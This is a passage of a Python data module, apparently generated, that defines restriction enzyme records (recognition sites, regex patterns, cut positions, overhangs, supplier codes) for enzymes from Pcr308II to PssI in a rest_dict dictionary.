    16384.0, -3, 'NNN', ('I',))
def _temp():
return {
'charac': (None, None, None, None, 'CCAAAG'),
'compsite': '(?=(?P<Pcr308II>CCAAAG))|(?=(?P<Pcr308II_as>CTTTGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pcr308II'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'WCGNNNNNNNCGW'),
'compsite': '(?=(?P<PcsI>[AT]CG.......CG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCGNNNNNNNCGW',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PcsI'] = _temp()
def _temp():
return {
'charac': (7, -1, None, None, 'GAATGC'),
'compsite': '(?=(?P<PctI>GAATGC))|(?=(?P<PctI_as>GCATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PctI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGGNAG'),
'compsite': '(?=(?P<Pdi8503III>CCGG.AG))|(?=(?P<Pdi8503III_as>CT.CCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pdi8503III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCCGGC'),
'compsite': '(?=(?P<PdiI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PdiI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<PdmI>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PdmI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACCAC'),
'compsite': '(?=(?P<Pdu1735I>CACCAC))|(?=(?P<Pdu1735I_as>GTGGTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pdu1735I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCAGT'),
'compsite': '(?=(?P<PenI>GCAGT))|(?=(?P<PenI_as>ACTGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PenI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAWTC'),
'compsite': '(?=(?P<PfeI>GA[AT]TC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'AWT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAWTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PfeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCGTAG'),
'compsite': '(?=(?P<Pfl1108I>TCGTAG))|(?=(?P<Pfl1108I_as>CTACGA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGTAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pfl1108I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<Pfl23II>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Pfl23II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNNGC'),
'compsite': '(?=(?P<Pfl8569I>GC..GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pfl8569I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<PflFI>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PflFI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<PflMI>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PflMI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RGCCCAC'),
'compsite': '(?=(?P<PflPt14I>[AG]GCCCAC))|(?=(?P<PflPt14I_as>GTGGGC[CT]))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCCCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PflPt14I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCNGGA'),
'compsite': '(?=(?P<PfoI>TCC.GGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCNGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCNGGA',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PfoI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TANAAG'),
'compsite': '(?=(?P<PfrJS12IV>TA.AAG))|(?=(?P<PfrJS12IV_as>CTT.TA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TANAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS12IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGGAG'),
'compsite': '(?=(?P<PfrJS12V>GGCGGAG))|(?=(?P<PfrJS12V_as>CTCCGCC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS12V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTTCNAC'),
'compsite': '(?=(?P<PfrJS15III>CTTC.AC))|(?=(?P<PfrJS15III_as>GT.GAAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PfrJS15III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGYGAB'),
'compsite': '(?=(?P<Pin17FIII>GG[CT]GA[CGT]))|(?=(?P<Pin17FIII_as>[ACG]TC[AG]CC))',
'dna': None,
'freq': 682.6666666666666,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYGAB',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pin17FIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<PinAI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['PinAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTRKCAG'),
'compsite': '(?=(?P<PinP23II>CT[AG][GT]CAG))|(?=(?P<PinP23II_as>CTG[AC][CT]AG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRKCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PinP23II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGNAG'),
'compsite': '(?=(?P<PinP59III>GAAG.AG))|(?=(?P<PinP59III_as>CT.CTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PinP59III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNGC'),
'compsite': '(?=(?P<PkrI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PkrI'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CATCAG'),
'compsite': '(?=(?P<PlaDI>CATCAG))|(?=(?P<PlaDI_as>CTGATG))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PlaDI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGATCG'),
'compsite': '(?=(?P<Ple19I>CGATCG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGATCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Ple19I'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<PleI>GAGTC))|(?=(?P<PleI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PleI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCCGAC'),
'compsite': '(?=(?P<PliMI>CGCCGAC))|(?=(?P<PliMI_as>GTCGGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PliMI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGCGCC'),
'compsite': '(?=(?P<PluTI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PluTI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PmaCI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['PmaCI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GTTTAAAC'),
'compsite': '(?=(?P<PmeI>GTTTAAAC))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTTAAAC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PmeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PmlI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PmlI'] = _temp()
def _temp():
return {
'charac': (-7, -24, 25, 8, 'GAACNNNNNCTC'),
'compsite': '(?=(?P<PpiI>GAAC.....CTC))|(?=(?P<PpiI_as>GAG.....GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -24,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 25,
'site': 'GAACNNNNNCTC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PpiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCRGAC'),
'compsite': '(?=(?P<PpiP13II>CGC[AG]GAC))|(?=(?P<PpiP13II_as>GTC[CT]GCG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCRGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PpiP13II'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<PpsI>GAGTC))|(?=(?P<PpsI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PpsI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ATGCAT'),
'compsite': '(?=(?P<Ppu10I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ppu10I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'YACGTR'),
'compsite': '(?=(?P<Ppu21I>[CT]ACGT[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YACGTR',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Ppu21I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<PpuMI>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PpuMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACATGT'),
'compsite': '(?=(?P<PscI>ACATGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACATGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PscI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RCCGAAG'),
'compsite': '(?=(?P<Pse18267I>[AG]CCGAAG))|(?=(?P<Pse18267I_as>CTTCGG[CT]))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pse18267I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACNNNNGTC'),
'compsite': '(?=(?P<PshAI>GAC....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('K', 'N'),
}
rest_dict['PshAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<PshBI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['PshBI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTATAA'),
'compsite': '(?=(?P<PsiI>TTATAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTATAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['PsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAAG'),
'compsite': '(?=(?P<Psp0357II>GCGAAG))|(?=(?P<Psp0357II_as>CTTCGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Psp0357II'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GGWCC'),
'compsite': '(?=(?P<Psp03I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Psp03I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Psp124BI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Psp124BI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AACGTT'),
'compsite': '(?=(?P<Psp1406I>AACGTT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AACGTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Psp1406I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<Psp5II>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Psp5II'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<Psp6I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Psp6I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<PspCI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PspCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<PspEI>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['PspEI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCAGC'),
'compsite': '(?=(?P<PspFI>CCCAGC))|(?=(?P<PspFI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PspFI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<PspGI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['PspGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<PspLI>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspLI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<PspN4I>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspN4I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGGCCC'),
'compsite': '(?=(?P<PspOMI>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['PspOMI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CGCCCAR'),
'compsite': '(?=(?P<PspOMII>CGCCCA[AG]))|(?=(?P<PspOMII_as>[CT]TGGGCG))',
'dna': None,
'freq': 8192.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCCAR',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PspOMII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<PspPI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['PspPI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGWCCY'),
'compsite': '(?=(?P<PspPPI>[AG]GG[AT]CC[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGWCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PspPPI'] = _temp()
def _temp():
return {
'charac': (21, 13, None, None, 'CCYCAG'),
'compsite': '(?=(?P<PspPRI>CC[CT]CAG))|(?=(?P<PspPRI_as>CTG[AG]GG))',
'dna': None,
'freq': 2048.0,
'fst3': 13,
'fst5': 21,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCYCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PspPRI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'VCTCGAGB'),
'compsite': '(?=(?P<PspXI>[ACG]CTCGAG[CGT]))',
'dna': None,
'freq': 7281.777777777777,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'VCTCGAGB',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['PspXI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAACNNNNNNTAC'),
'compsite': '(?=(?P<PsrI>GAAC......TAC))|(?=(?P<PsrI_as>GTA......GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAACNNNNNNTAC',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PsrI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<PssI>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
